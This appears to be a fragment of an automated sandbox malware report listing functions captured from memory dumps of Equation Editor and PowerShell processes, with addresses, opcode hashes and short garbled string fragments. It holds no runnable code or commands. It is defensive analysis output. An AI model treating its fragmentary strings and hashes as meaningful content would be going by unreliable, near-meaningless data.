                                                                                              • Snapshot File: hcaresult_2_2_35a0000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 8228f960be2d5f117e1ae1155cad6b50a1c95f99a5d1b00cd55f02d47146174e
                                                                                              • Instruction ID: 839c877c24ef3c3e7a558d8a6fec42267aaac8299c31b0cf46a002ec8f2bb3e7
                                                                                              • Opcode Fuzzy Hash: 8228f960be2d5f117e1ae1155cad6b50a1c95f99a5d1b00cd55f02d47146174e
                                                                                              • Instruction Fuzzy Hash: 2121B25682EBC15FD312E778A9AA059FF307A1311075D85CFC0868F0F3E3549546E356

                                                                                              Executed Functions

                                                                                              Function 0021D01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.496364287.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_21d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 67c497320f8769ced6908118ead0321249c63cede8911c15b8e9f7f2cc14c09b
                                                                                              • Instruction ID: ad1083440fcfc11cd9fac82f5eb98b1465e9035c9ef79a65af494a57fa714820
                                                                                              • Opcode Fuzzy Hash: 67c497320f8769ced6908118ead0321249c63cede8911c15b8e9f7f2cc14c09b
                                                                                              • Instruction Fuzzy Hash: 5C01F771514340EEE7104E19C8C4BA7BFD8EF59324F18845AED444B286C2B9D885CAB1
                                                                                              Function 0021D01C Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.496364287.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_21d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b478b41601b88ffb1867947b38ef6177c807833fd5801ed17c4c016659e395d3
                                                                                              • Instruction ID: 4f7cc146fc7cd2f96046ce0971b22efb60edace8698275a8e9fe787af48a1ed3
                                                                                              • Opcode Fuzzy Hash: b478b41601b88ffb1867947b38ef6177c807833fd5801ed17c4c016659e395d3
                                                                                              • Instruction Fuzzy Hash: F7F06271504344AFE7108E1ACCC4BA6FFD8EB55728F18C55AED485E286C2799C84CAB1

                                                                                              Executed Functions

                                                                                              Function 00454830 Relevance: 24.5, Strings: 19, Instructions: 770COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (p$4'p$4'p$4'p$4'p$4'p$4'p$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$tPp$tPp$tPp$tPp
                                                                                              • API String ID: 0-3369514596
                                                                                              • Opcode ID: ce63a7c112e1940c00049e31dac6166699595a6a57bc8aecbb4cdee07ca047b0
                                                                                              • Instruction ID: 1e31b6ac35ed1da721c0040263b787449336d0115881e998aa39ae130942d13d
                                                                                              • Opcode Fuzzy Hash: ce63a7c112e1940c00049e31dac6166699595a6a57bc8aecbb4cdee07ca047b0
                                                                                              • Instruction Fuzzy Hash: 29422835B043008FCB159A789451A7BBBF2AFC5316F2480ABD945CF396CA35CC8AC796
                                                                                              Function 00455A48 Relevance: 15.6, Strings: 12, Instructions: 614COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$4'p$4'p$h%f$h%f$h%f$h%f$tPp$tPp$$p$$p
                                                                                              • API String ID: 0-228633687
                                                                                              • Opcode ID: b01f8d8043a8a029b31d2e5f97298aba3aff07c4950e94756144b39791cf3312
                                                                                              • Instruction ID: d2ab40d1794d0400859d98438ec85e28ff10107c72a6043b4f07b0da7f84fa5c
                                                                                              • Opcode Fuzzy Hash: b01f8d8043a8a029b31d2e5f97298aba3aff07c4950e94756144b39791cf3312
                                                                                              • Instruction Fuzzy Hash: B32238317047008FCB199B78D860A7ABBF2AF85311F28C0ABD945CB396DA35DC4AC795
                                                                                              Function 00455231 Relevance: 14.2, Strings: 11, Instructions: 430COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$4'p$4'p$h%f$h%f$h%f$h%f$h%f$h%f$$p
                                                                                              • API String ID: 0-3271162130
                                                                                              • Opcode ID: add8d9cb2f4bc1b1092a2e0e8c5b0cf31057fd66abb13a1874cafeb25d605f5d
                                                                                              • Instruction ID: 9f3faa8582118d1b288c348a8ce75b4852c1d7e1dfd63310e49197817f8d048c
                                                                                              • Opcode Fuzzy Hash: add8d9cb2f4bc1b1092a2e0e8c5b0cf31057fd66abb13a1874cafeb25d605f5d
                                                                                              • Instruction Fuzzy Hash: 1AE107317087809FCB158B78982077A7FB29FC2312F2884ABD945CB257DA75CD4AC796
                                                                                              Function 00456800 Relevance: 13.0, Strings: 9, Instructions: 1701COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: L4p$L4p$L4p$h%f$h%f$h%f$h%f$[f$[f
                                                                                              • API String ID: 0-1418904640
                                                                                              • Opcode ID: c74384c463bfa47565561b606cf0dca8df79647fc6d368c1ca44dcc383045333
                                                                                              • Instruction ID: 268af5f37d1a505e45fd076e28113659d6ebab4cc26885fed72cb05bf2617c1a
                                                                                              • Opcode Fuzzy Hash: c74384c463bfa47565561b606cf0dca8df79647fc6d368c1ca44dcc383045333
                                                                                              • Instruction Fuzzy Hash: 7042E134B002049FDB14DB68D440BAEBBF2AF85311F65C06AED459B396CB35DC8ACB56
                                                                                              Function 00453AC0 Relevance: 10.5, Strings: 8, Instructions: 472COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$h%f$h%f$h%f$h%f$h%f$h%f
                                                                                              • API String ID: 0-3039613253
                                                                                              • Opcode ID: 0e8edfacff0cbac6257c38241342e096d0f5ac5055534fa570cd795dc94cc978
                                                                                              • Instruction ID: 1d10c4c5c481b463dae7aa36f7c4a0663b96cfb9f48f88f463bde3ce5b60af23
                                                                                              • Opcode Fuzzy Hash: 0e8edfacff0cbac6257c38241342e096d0f5ac5055534fa570cd795dc94cc978
                                                                                              • Instruction Fuzzy Hash: 97F13431B043008FCB158E68880566BBBF2AFC5353F2884ABD905DB353DA39DE49C766
                                                                                              Function 00450AD0 Relevance: 6.4, Strings: 5, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$$p$$p$$p
                                                                                              • API String ID: 0-2334450948
                                                                                              • Opcode ID: 6126416b77d2b2d507819edc13faab6feea00fea23f92e1455eb4103a656440b
                                                                                              • Instruction ID: d953a72f3249b6cfe48abb813ee28697f2e9e3c34913632c3b80a0a1971caa82
                                                                                              • Opcode Fuzzy Hash: 6126416b77d2b2d507819edc13faab6feea00fea23f92e1455eb4103a656440b
                                                                                              • Instruction Fuzzy Hash: 41512338B002059FDB299EA8D84067FB7A2EFC1315F24842BDC15CB356DA36DD4AC795
                                                                                              Function 004530D5 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: h%f$h%f
                                                                                              • API String ID: 0-3696830061
                                                                                              • Opcode ID: 2732a8a62e9348c5400586f7e25e3136f2075ed7905a9e0b566d64b1708d048d
                                                                                              • Instruction ID: 2688f32c50593864a3682bcc9913699b33539276ade04551dbc7388cafd04114
                                                                                              • Opcode Fuzzy Hash: 2732a8a62e9348c5400586f7e25e3136f2075ed7905a9e0b566d64b1708d048d
                                                                                              • Instruction Fuzzy Hash: 60310671B006104BCB259E789810A6FBBB29FD4752B2484BFCD419F346CD36CE06C796
                                                                                              Function 00454E04 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$tPp
                                                                                              • API String ID: 0-2826180314
                                                                                              • Opcode ID: 27dfd9e18dde7b63e8fd4c2a5238870a659bd9b39c60e1ee69693ff9feb4f303
                                                                                              • Instruction ID: 7c2502a873e48704d1e936e55dd297dcd1a38987e7fc49cd807b1d627291d2f4
                                                                                              • Opcode Fuzzy Hash: 27dfd9e18dde7b63e8fd4c2a5238870a659bd9b39c60e1ee69693ff9feb4f303
                                                                                              • Instruction Fuzzy Hash: 6D319332B002009FDB24CA19C445B6AB7E2BBD431AF18C0ABDD155F356C775DD89CB95
                                                                                              Function 00451218 Relevance: 2.6, Strings: 2, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: l;6$l;6
                                                                                              • API String ID: 0-204682027
                                                                                              • Opcode ID: 3e4b6fda3a97ed2840ff2c0ee993465ff89f989c6695e0f426ebd9cc58e2b8f2
                                                                                              • Instruction ID: e876d37ca5bfa284e48a21143696ac92a06e00e5d7bbd170c4fb007eba44fd07
                                                                                              • Opcode Fuzzy Hash: 3e4b6fda3a97ed2840ff2c0ee993465ff89f989c6695e0f426ebd9cc58e2b8f2
                                                                                              • Instruction Fuzzy Hash: 9D21373530031197DB2415AAC841B3BBA9B9BC9302F28847FE946DB3D6DEB9DC49C325
                                                                                              Function 002E3BFF Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493574921.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_2e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @X
                                                                                              • API String ID: 0-3831194306
                                                                                              • Opcode ID: 477aa997c9e7a44f283e64cff82a697563517f49b245bf925d59a2dff4000e8f
                                                                                              • Instruction ID: 966d3794455070024c15b3d3105e8b702e510ea99f06415f850c7542280ac3b3
                                                                                              • Opcode Fuzzy Hash: 477aa997c9e7a44f283e64cff82a697563517f49b245bf925d59a2dff4000e8f
                                                                                              • Instruction Fuzzy Hash: C8B14B74A102999FCB04CFA9D484A9DFBF2BF88314F688559E804AB355C771ED86CB90
                                                                                              Function 00455E74 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p
                                                                                              • API String ID: 0-481844870
                                                                                              • Opcode ID: a0f92c6d90db5df04071cf196b4499ad8e2caa95faa2af9a506d72a6a765d442
                                                                                              • Instruction ID: 9c92be30480ab44c08c43e03e4d348da4d3ca8b9adbda82d61a6efcdaba3f499
                                                                                              • Opcode Fuzzy Hash: a0f92c6d90db5df04071cf196b4499ad8e2caa95faa2af9a506d72a6a765d442
                                                                                              • Instruction Fuzzy Hash: FC21D331A00A01CFCB24CF24C56467AB7B1AF84312F19816BD8098B356D739DD8ACB55
                                                                                              Function 00455E80 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p
                                                                                              • API String ID: 0-481844870
                                                                                              • Opcode ID: 6f44f9d932cfe263e5312872722d7de9c80deb4b75b6af7b9e61a40039058964
                                                                                              • Instruction ID: 6f8849f6efe37c50c5947db798eabcaac9f1c485d9e8bb7edff05b2f0d60b7e8
                                                                                              • Opcode Fuzzy Hash: 6f44f9d932cfe263e5312872722d7de9c80deb4b75b6af7b9e61a40039058964
                                                                                              • Instruction Fuzzy Hash: 1621C131A00B01DFCB24DF25C56463AB7B1AF84312F19806BD8098B356D738DD89CB99
                                                                                              Function 00453C64 Relevance: .1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 861e36133529ec461d9fec4d40206dd5f36e076e1f1243337eec5bfc03a72734
                                                                                              • Instruction ID: 93fc2ee0b5cb5b303752d1d138738ff123a76adefcc6d7fc3b873e43200e5b8c
                                                                                              • Opcode Fuzzy Hash: 861e36133529ec461d9fec4d40206dd5f36e076e1f1243337eec5bfc03a72734
                                                                                              • Instruction Fuzzy Hash: CB21B575A00204CFCB24DF54D445AAABBB2AB84793F1481ABDC09AB317D339DE4DCB55
                                                                                              Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493526056.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5dd3972897be336007408d7f083128b868f0b0f1f9ee7f89d33af5c58902b484
                                                                                              • Instruction ID: 98744a3ffb46b000b885af94600dbc57c64d3b9dd7b3e4d9ca9037b8d486c79c
                                                                                              • Opcode Fuzzy Hash: 5dd3972897be336007408d7f083128b868f0b0f1f9ee7f89d33af5c58902b484
                                                                                              • Instruction Fuzzy Hash: 1101A771504340AAEB104E25DC84BA7BFD8EF41724F2C855AFC494B296C779D845CAB1
                                                                                              Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493526056.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dc16bcce97b1912fce977852efb4e076a1f51bebba522c5b540e4583d0461c86
                                                                                              • Instruction ID: 1d32fbf8e25383ea0e5d4a575db20b15f545b07308c2bc9c9d069fef708bbb7e
                                                                                              • Opcode Fuzzy Hash: dc16bcce97b1912fce977852efb4e076a1f51bebba522c5b540e4583d0461c86
                                                                                              • Instruction Fuzzy Hash: FBF06271404344AFEB108A16DCC4BA6FFD8EB41734F18C55AED484E296C3799C45CAB1
                                                                                              Function 002E3BB5 Relevance: .0, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493574921.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_2e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b3403befbff4e7fb238dc3c10c6ec76a67d8526de5d229a252486de7fd95f8fd
                                                                                              • Instruction ID: c86759227e4706e8c876252b1e1662f26397b0d6d50e9e45f267e5f479730dac
                                                                                              • Opcode Fuzzy Hash: b3403befbff4e7fb238dc3c10c6ec76a67d8526de5d229a252486de7fd95f8fd
                                                                                              • Instruction Fuzzy Hash: DCE065357001109BC2148A0CD89066EF796FBC8215BB9852DE88A87388CA32ED83C781

                                                                                              Non-executed Functions

                                                                                              Function 00451348 Relevance: 21.7, Strings: 17, Instructions: 492COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$tPp$tPp$$p$$p$$p$$p$$p$$p$$p
                                                                                              • API String ID: 0-4022783670
                                                                                              • Opcode ID: 84667a68aff095737e1fdf10c923649d2db41964654b64194bf73bdf451acbd8
                                                                                              • Instruction ID: e60badf32f73d636d74b526c694dc667016d1169bb0048f6c5e3feb6ee8cfe33
                                                                                              • Opcode Fuzzy Hash: 84667a68aff095737e1fdf10c923649d2db41964654b64194bf73bdf451acbd8
                                                                                              • Instruction Fuzzy Hash: 28F1F735A042449FCB259B68C85076BBFF2AFC5311F2880AFDD458B362DA39CD49C796
                                                                                              Function 004500A0 Relevance: 21.7, Strings: 17, Instructions: 427COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (:6$(:6$(:6$4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$L:6$L:6$L:6$p:6$$p$$p
                                                                                              • API String ID: 0-332510160
                                                                                              • Opcode ID: 89ed438b0ef43c35102bb238b5170d135bd5c9eef2bc030e87cf1622d5f325df
                                                                                              • Instruction ID: df2e740985297c45da922004fbfbe2dc8ef52284a196ac0b1b99c4c067481064
                                                                                              • Opcode Fuzzy Hash: 89ed438b0ef43c35102bb238b5170d135bd5c9eef2bc030e87cf1622d5f325df
                                                                                              • Instruction Fuzzy Hash: DEE11439700204EFCB258E68D4547AF7BA2AF81311F28806BED459B396CB79CD49C796
                                                                                              Function 00451A20 Relevance: 19.1, Strings: 15, Instructions: 315COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$@=6$@=6$@=6$d=6$h%f$h%f$tPp$tPp$$p$$p$$p$[f$[f
                                                                                              • API String ID: 0-4067764217
                                                                                              • Opcode ID: 6dac853c0e105519574c0c516d7dbdad941286fb0edf531ab8a6f8ea005114a9
                                                                                              • Instruction ID: d65daee55e52b709b888f607c7334958c4a6638f9a06ee21fa76d21743d352df
                                                                                              • Opcode Fuzzy Hash: 6dac853c0e105519574c0c516d7dbdad941286fb0edf531ab8a6f8ea005114a9
                                                                                              • Instruction Fuzzy Hash: FCA116317043408FC7268A789410B6BBBF29FC5312F28846FD945CB3A6DA76DC4AC7A5
                                                                                              Function 004505C8 Relevance: 15.2, Strings: 12, Instructions: 243COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $;6$$;6$$;6$(Fc$(Fc$(Fc$L4p$L4p$L4p$h<6$$p$$p
                                                                                              • API String ID: 0-1670674408
                                                                                              • Opcode ID: c558321700b81064ce3e9c108a871f4effc84dfa8181e90f9867a0075234b02e
                                                                                              • Instruction ID: 78598e857635962642626e51dce178ba09447bd2de4204cc9f8886778cc1cb44
                                                                                              • Opcode Fuzzy Hash: c558321700b81064ce3e9c108a871f4effc84dfa8181e90f9867a0075234b02e
                                                                                              • Instruction Fuzzy Hash: 0B814839B003049FCB259A68C84076F7BA2AFC4311F28846BDD518B396CB74DD45CB96
                                                                                              Function 00456206 Relevance: 8.0, Strings: 6, Instructions: 451COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: h%f$h%f$h%f$h%f$[f$[f
                                                                                              • API String ID: 0-1883429819
                                                                                              • Opcode ID: e71b1e2db06688f805df07d760ae2bfbea0cd348b27b6259f5554457051e1a62
                                                                                              • Instruction ID: b41f2981e1f9da1e44063c05168aead5078493d1439297ce32b86d34d81b622c
                                                                                              • Opcode Fuzzy Hash: e71b1e2db06688f805df07d760ae2bfbea0cd348b27b6259f5554457051e1a62
                                                                                              • Instruction Fuzzy Hash: 9C02A234B002049FDB14DB68D450E6ABBF2AF89305F65C0AAEC459F396CB35DC4ACB55
                                                                                              Function 00452D98 Relevance: 6.5, Strings: 5, Instructions: 202COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$h%f$h%f$$p
                                                                                              • API String ID: 0-583542672
                                                                                              • Opcode ID: f4ca1bff2f46fa3f8d6971658c2ddd37b07e394c63cafab39c9d26d0770d7380
                                                                                              • Instruction ID: 5bdd61ae5858bcd162c178715087aade54535f19fd36c998dbd2581274badf30
                                                                                              • Opcode Fuzzy Hash: f4ca1bff2f46fa3f8d6971658c2ddd37b07e394c63cafab39c9d26d0770d7380
                                                                                              • Instruction Fuzzy Hash: BA6137357043009FC7158A68995176BBBB2AFD7312F2484BFD945CB392DAB4CC4AC3A6
                                                                                              Function 00450001 Relevance: 6.4, Strings: 5, Instructions: 173COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (:6$(:6$L4p$L4p$L4p
                                                                                              • API String ID: 0-234110820
                                                                                              • Opcode ID: 45fcdd3f6148d49618a5e805c14fde9c6407c8eb0bbdbad2a1e4db0166c86214
                                                                                              • Instruction ID: 14049d85fb832079d3b6ca28edeb0d95d6d507905b018c7470ea08758ae35bd7
                                                                                              • Opcode Fuzzy Hash: 45fcdd3f6148d49618a5e805c14fde9c6407c8eb0bbdbad2a1e4db0166c86214
                                                                                              • Instruction Fuzzy Hash: A451A5355093849FCB128B64D85476A7FB2AF42301F1941EBE8809B2A3C779DD49CB66
                                                                                              Function 00455780 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: h%f$h%f$$p$$p$$p
                                                                                              • API String ID: 0-930881452
                                                                                              • Opcode ID: a6807ad38fb20eab6858f782deda0bfb5ab66e56380cd161b8f1c2df7d48812b
                                                                                              • Instruction ID: a3a87c1a7416c2c0d149bb1bf029f86179e6cd631d72e2f678216fa6d70c1fc8
                                                                                              • Opcode Fuzzy Hash: a6807ad38fb20eab6858f782deda0bfb5ab66e56380cd161b8f1c2df7d48812b
                                                                                              • Instruction Fuzzy Hash: CF412535B007018FC714AA68942067BBBE19FC5322F28847BD945C7312DA39CD5AC7A6
                                                                                              Function 004510C8 Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: H;6$H;6$$p$$p$$p
                                                                                              • API String ID: 0-604180952
                                                                                              • Opcode ID: c459f8082ad1d905bd324a5fb1f6d2155d475294143f8dff5d35c1a6c9636828
                                                                                              • Instruction ID: 0efe5edc6cbbf78657cb34abc9d1882eade21a2dae93931aeb1b6c48967894fb
                                                                                              • Opcode Fuzzy Hash: c459f8082ad1d905bd324a5fb1f6d2155d475294143f8dff5d35c1a6c9636828
                                                                                              • Instruction Fuzzy Hash: 0C316436B002018BCB249A69D80167FFBA2AFC8311B24846FDE59D7352DE35DD0AC7A5
                                                                                              Function 00454B78 Relevance: 5.2, Strings: 4, Instructions: 164COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$h%f$h%f$tPp
                                                                                              • API String ID: 0-2061459839
                                                                                              • Opcode ID: 48341346cd2061bd50765dee9b9a01189cbab3a40aeeb81b6056de7a7a24d61d
                                                                                              • Instruction ID: 569d093bc1036eff4129741aa0df5e9b50a547535bf2c33c0b22943a784fb986
